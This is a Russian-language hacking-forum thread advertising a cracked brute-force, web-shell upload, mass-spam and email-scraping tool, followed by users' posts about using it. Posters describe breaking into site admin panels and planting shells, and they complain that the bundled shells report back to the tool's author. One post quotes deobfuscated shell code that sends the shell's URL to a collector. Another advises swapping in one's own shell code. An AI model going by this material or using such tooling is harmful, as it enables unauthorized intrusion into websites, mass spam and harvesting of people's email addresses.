[PBS 2.0.5 Crack] Комбайн брута, спама, парсинга.

К

Корнес





Описание:

В программе полностью переписаны алгоритмы многих процессов!
В процессе тестирования брута софт показал увеличение процента гудов на 30%.
Увеличен процент заливки на движки сайтов, он достиг более 50%.
PHP спамер достигает скорости рассылки в 1000-1500 писем в секунду(и это лишь ограничивается интернетом и количеством скриптов).
Добавлен уникальный в своем роде google парсер который собирает домены для брута и поиска эмейлов через залитые скрипты. Процесс самого сбора доменов происходит на скрипте - программа лишь раздает поисковые запросы скриптам и получает ответы. Скорость сбора доменов достигает 6000-10000 в минуту(эти границы зависят от скорости интернета и количества скриптов).
Улучшены алгоритмы парсинга доменов через обычный google парсер(работа с типами прокси+ парсинг 100 результатов за один запрос.
Парсер и чекер прокси оптимизирован под поиск прокси и проверку их на работоспособность в парсере. Хотя и мало в паблике хороших прокси, но чекер определит рабочие для парсинга.
Парсер mail.ru подстроен под изменения mail.ru и собирает тысячи ящиков в секунду.
Парсер email адресов с доменов протестирован и содержит в себе алгоритм чистки списка от нерабочих email адресов.
Планировщик работы программы - даст вам возможность спланировать работу софта на недели вперед и просто максимально эффективно использовать свое время один раз настроив программу.



Цена продукта: 300$


To view the content, you need to Sign In or Register.

Cкрытый контент, нужно авторизируйся или присоединяйся.
 
Последнее редактирование модератором:

tankist

Член Клуба
Народ кто юзал этот софт помогите разобраться!

С помошью проги сбрутил админки, в админки заходил пароли подходят, когда залил шелл который установлен в проге по умалчанию возник вопрос а какой пароль от шеллки нужно вводить чтобы получить доступ к папкам, как автор показывает в видео. Короче ссылку из файла "uploaded.txt" открыл в браузере, нажал "Port 80", открылась строка "Password:" и где брать этот пароль, пароль от админки не подходит ? Его наверное нужно прописывать или искать в самом файле system.php или themplate.txt которые лежат в папке syell? Помогите разобраться кто понял.

Вот скрин
 

GenaHorosh

Премиум
Лично я спамер пытался запустить, но не получилось ничего, потому как скрипты не загружаются в файл и рассылка невозможна. Я много где искал, но толком не нашел объяснений... Жаль конечно, видно, что софт хороший, но видимо крякнутую версию уже не поддерживают... или я в чем-то не разобрался... Если у кого-то получилось, напишите, буду признателен)
 

matrixa2011

Премиум
На данная версия сливает шеллы автору, так что рекомендую переходить на 2,0,6
 

tankist

Член Клуба
там сливает сам шелл, в шелле стоит стучалка, которая отстукивает автору шелла куда был установлен сам шелл.
 

Refcat

Член Клуба
там сливает сам шелл, в шелле стоит стучалка, которая отстукивает автору шелла куда был установлен сам шелл.
То есть либо лопатить файл который заливает прога (это реально вообще?), либо ждать и надеяться на кряк 2.0.6?
 

tankist

Член Клуба
То есть либо лопатить файл который заливает прога (это реально вообще?), либо ждать и надеяться на кряк 2.0.6?
2.0.6 более глючная, эта лучше работает. Просто найди все шеллы в папке shel их там будет 5 штук и замени коды шеллов на свой код и вперед... ;)
 

Refcat

Член Клуба
2.0.6 более глючная, эта лучше работает. Просто найди все шеллы в папке shel их там будет 5 штук и замени коды шеллов на свой код и вперед... ;)
[USERS=] [/USERS]
Как можно пообщаться в привате касательно кодов в шелах? Ибо я туда мокнулся и растерялся =)
 

tankist

Член Клуба
И как с ним, скажите пожалуйста, работать?
Забейт на него совтина умерла, кто успел тот немного поработал с ней, очень жаль конечно, проделал очень много работы,
как подготовил все к массовым рассылкам, софт сдох. :(
 

Refcat

Член Клуба
Забейт на него совтина умерла, кто успел тот немного поработал с ней, очень жаль конечно, проделал очень много работы,
как подготовил все к массовым рассылкам, софт сдох. :(
Расскажите пожалуйста почему умерла? Вроде бы работает, брутит, заливает шелы, рассылает. Единственное я не знаю как правит код шела - ибо он зашифрован.
 

Refcat

Член Клуба
А зачем править код шелла, он весьма не плох))
Поговорили ниочем - уже обсуждалось что после заливки шел сливается разработчику софта. Вот затем и править. Если нечего сказать по делу - лучше не комментировать.
 

matrixa2011

Премиум
Не в коде шелла слив установлен, и глупости не пишите, сам процесс прописан в коде программы, а в шелле только функции самого шелла....
 

tankist

Член Клуба
Не в коде шелла слив установлен, и глупости не пишите, сам процесс прописан в коде программы, а в шелле только функции самого шелла....
Ну не знаю не знаю.

1. сам шелл стучит
начало anticopy.php (аналогично debug.php) если деобфусифицировать
$url = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; - адрес шелла
file_get_contents(" ".base64_encode($url)); - сборщик шеллов

2. софт шлёт письма с адресами шелов на мыла так называемому автору в таком виде

 
Сверху
... ...